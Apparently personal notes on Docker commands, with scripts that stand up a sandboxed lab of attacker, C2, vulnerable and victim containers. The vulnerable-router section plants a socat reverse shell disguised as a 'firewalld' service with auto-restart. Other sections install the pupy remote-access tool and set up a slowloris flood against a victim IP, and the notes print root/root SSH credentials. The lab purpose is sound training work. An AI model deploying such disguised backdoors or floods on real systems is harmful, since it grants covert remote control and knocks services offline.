Installing Docker on Debian

curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add - &&
echo 'deb https://download.docker.com/linux/debian stretch stable' > /etc/apt/sources.list.d/docker.list &&
apt-get update &&
apt-get install docker-ce &&
docker run hello-world &&
docker version

Copying files from Docker container to host

Find your container ID

docker ps | awk '{print $1}'

Copy it.

docker cp <containerId>:/file/path/within/container /host/path/target

sudo docker cp goofy_roentgen:/tmp/expl /tmp

Spawn shell

docker exec -it <CONTAINER_ID> /bin/sh

Kill Container

sudo docker kill {container-id}

Docker error response from daemon: “Conflict … already in use by container”

docker rm -f qgis-desktop-2-4

#!/bin/bash
# declare an array called array and define 3 vales
foo=( cnc-server scrubber-server waf-server laptop_attacker scrubber-router laptop-user firewall-router vul-router vulnerable-server victim-server )
for i in "${!foo[@]}"; do
  DIP="172.18.0.10${i}"
  DOBJECT="${foo[$i]}"
  DHOSTNAME=$(echo $DOBJECT | tr -cd '[:alnum:]')
  sudo docker run -dit --net sandbox --hostname $DHOSTNAME --ip $DIP --restart unless-stopped -P --name "${DHOSTNAME}sshd" $DOBJECT
done

#DOBJECT="waf-server"
#DHOSTNAME=$(echo $DOBJECT | tr -cd '[:alnum:]')
#sudo docker run -dit --net sandbox --hostname $DHOSTNAME --ip 172.18.0.100 --restart unless-stopped -P --name "${DHOSTNAME}sshd" $DOBJECT
#CONTAINER_ID=$(sudo docker ps | grep $DHOSTNAME | awk '{print $1}')
#sudo docker kill $CONTAINER_ID
#sudo docker rm -f "${DHOSTNAME}sshd"
#sudo docker commit $CONTAINER_ID $DOBJECT

#!/bin/bash
# run all docker
foo=( cnc-server scrubber-server waf-server laptop_attacker scrubber-router laptop-user firewall-router vul-router vulnerable-server victim-server )
for i in "${!foo[@]}"; do
  DIP="172.18.0.10${i}"
  DOBJECT="${foo[$i]}"
  DHOSTNAME=$(echo $DOBJECT | tr -cd '[:alnum:]')
  echo $DIP $DOBJECT $DHOSTNAME "STARTING ..."
  sudo docker run -dit --net sandbox --hostname $DHOSTNAME --ip $DIP --restart unless-stopped -P --name "${DHOSTNAME}sshd" $DOBJECT
done
# kill all docker
foo=( cnc-server scrubber-server waf-server laptop_attacker scrubber-router laptop-user firewall-router vul-router vulnerable-server victim-server )
for i in "${!foo[@]}"; do
  DOBJECT="${foo[$i]}"
  DHOSTNAME=$(echo $DOBJECT | tr -cd '[:alnum:]')
  CONTAINER_ID=$(sudo docker ps | grep $DHOSTNAME | awk '{print $1}')
  sudo docker kill $CONTAINER_ID
  sudo docker rm -f "${DHOSTNAME}sshd"
  echo $DOBJECT $DHOSTNAME "KILLED!"
done
#DOBJECT="waf-server"
#DHOSTNAME=$(echo $DOBJECT | tr -cd '[:alnum:]')
#sudo docker run -dit --net sandbox --hostname $DHOSTNAME --ip 172.18.0.100 --restart unless-stopped -P --name "${DHOSTNAME}sshd" $DOBJECT
#CONTAINER_ID=$(sudo docker ps | grep $DHOSTNAME | awk '{print $1}')
#sudo docker kill $CONTAINER_ID
#sudo docker rm -f "${DHOSTNAME}sshd"
#sudo docker commit $CONTAINER_ID $DOBJECT

Commit

DOBJECT="waf-server"
DHOSTNAME=$(echo $DOBJECT | tr -cd '[:alnum:]')
CONTAINER_ID=$(sudo docker ps | grep $DHOSTNAME | awk '{print $1}')
sudo docker commit $CONTAINER_ID $DOBJECT

Run all

#!/bin/bash
# run all docker
foo=( cnc-server scrubber-server waf-server laptop_attacker scrubber-router laptop-user firewall-router vul-router vulnerable-server victim-server )
for i in "${!foo[@]}"; do
  DIP="172.18.0.10${i}"
  DOBJECT="${foo[$i]}"
  DHOSTNAME=$(echo $DOBJECT | tr -cd '[:alnum:]')
  echo $DIP $DOBJECT $DHOSTNAME "STARTING ..." "SSH ACCESS: sshpass -p 'root' ssh root@$DIP" "SHELLINABOX PORT:" 420${i}
  sudo docker run -dit --net sandbox --hostname $DHOSTNAME --ip $DIP --restart unless-stopped -p 420${i}:4200 -P --name "${DHOSTNAME}sshd" $DOBJECT
done

CNC SERVER

# CNCSERVER
sudo apt update -y && sudo apt upgrade -y && sudo apt install netcat python-future python-six python-enum34 python-flake8 python-pygments python-xattr apt-transport-https git locales language-pack-id && sudo apt install --reinstall python-pip -y && sudo python -m pip uninstall pip && sudo apt install python-pip --reinstall && pip install dukpy && git clone https://github.com/ricmoo/pyaes.git && (cd pyaes; sudo python setup.py install) && git clone https://github.com/snoack/flake8-per-file-ignores.git && (cd flake8-per-file-ignores; sudo python setup.py install) && git clone https://github.com/n1nj4sec/pupy.git && export LC_ALL="en_US.UTF-8" && export LC_CTYPE="en_US.UTF-8" && sudo dpkg-reconfigure locales && export LC_ALL=C && (cd pupy; ./install.sh) && (cd pupy/pupy; pip install -r requirements.txt)

VULNERABLE SERVER

apt install -y socat apache2 supervisor

update-rc.d cron enable
update-rc.d apache2 enable
update-rc.d supervisor enable
service cron start
service apache2 start
service supervisor start
service cron status
service apache2 status
service supervisor status

supervisorctl stop all
supervisorctl reread
supervisorctl update
supervisorctl avail

(cd /var/local; git clone https://github.com/gkbrk/slowloris.git)

VULNERABLE ROUTER

apt install -y socat supervisor git && update-rc.d supervisor enable && service supervisor start && service supervisor status && ls /etc/supervisor/conf.d/ && supervisorctl stop all && supervisorctl reread && supervisorctl update && supervisorctl avail

cat <<'EOF' > /etc/supervisor/conf.d/firewalld.conf
[program:firewalld]
directory = /var/local/
command = firewalld --update
startsecs = 0
autorestart = true
stdout_logfile=/var/log/firewalld.out.log
stderr_logfile=/var/log/firewalld.err.log
EOF

cat <<'EOF' > /usr/bin/firewalld
#!/bin/bash
nohup socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:172.18.0.100:80 &
EOF

chmod +x /usr/bin/firewalld

(cd /var/local; git clone https://github.com/gkbrk/slowloris.git)

echo "python3 slowloris/slowloris.py 172.18.0.109" > attack.sh && chmod +x attack.sh

Slides

• https://speakerdeck.com/fr333k/security-in-docker
• https://askubuntu.com/questions/505506/how-to-get-bash-or-ssh-into-a-running-container-in-background-mode